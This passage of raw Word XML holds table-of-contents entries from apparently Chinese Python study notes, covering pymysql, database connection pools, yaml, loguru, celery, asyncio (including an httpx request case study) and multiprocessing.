              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779960 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35B0F64E" w14:textId="42708313" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779961" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>报错</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ValueError: parameters are of unsupported type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779961 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>490</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60E5D272" w14:textId="2C450F27" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779962" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pymysql+dbutils</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：数据库连接池</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779962 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>490</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BC73D86" w14:textId="694ADEEC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779963" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PersistentDB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779963 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>490</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55901CEA" w14:textId="1E653E47" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779964" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PooledDB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779964 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>491</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14B211C1" w14:textId="15A16D4E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779965" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>yaml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779965 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>492</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E5FDD4D" w14:textId="09F86478" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779966" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>读取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779966 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>492</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EB991B1" w14:textId="4D4C333C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779967" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>写入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779967 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>492</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0016E80E" w14:textId="17BD6524" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779968" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>日志：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>loguru</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779968 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>493</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09D10FC5" w14:textId="13A8E59E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779969" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>我的改进</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>:loguru_log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779969 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>493</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3456B243" w14:textId="1CD74BE0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779970" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分布式异步：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>celery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779970 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>496</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D019696" w14:textId="359DDE9F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779971" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>asyncio</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：异步、携程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779971 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>497</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40FAF5D9" w14:textId="23A63D9F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779972" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>总结后的用法归纳</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779972 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>498</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76B65B52" w14:textId="1C9EBEF6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779973" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>实际案例：用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>httpx</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>库请求</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sploitus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779973 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>504</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CDA62A8" w14:textId="10B0254B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779974" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>chatGPT</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>回答的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>async</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779974 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>505</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7107A942" w14:textId="2BFDA324" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779975" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多进程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779975 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>518</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DF54E33" w14:textId="6EC62F68" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779976" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>multiprocessing.Process</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779976 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>518</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56C5D2DE" w14:textId="02573F93" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779977" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>multiprocessing.Pool</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779977 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
